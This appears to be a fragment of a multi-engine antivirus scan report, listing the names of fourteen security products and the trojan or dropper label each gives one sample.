ZoneAlarm HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
GData IL:Trojan.MSILZilla.9891
Google Detected
AhnLab-V3 Malware/Win.Generic.C4478643
Acronis suspicious
VBA32 Trojan.MSIL.Injector.gen
MAX malware (ai score=82)
Cylance unsafe
TrendMicro-HouseCall TROJ_GEN.R002C0DCL23
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
SentinelOne Static AI - Malicious PE
Fortinet MSIL/GenKryptik.FFMZ!tr
AVG Win32:DropperX-gen [Drp]
Panda Trj/GdSda.A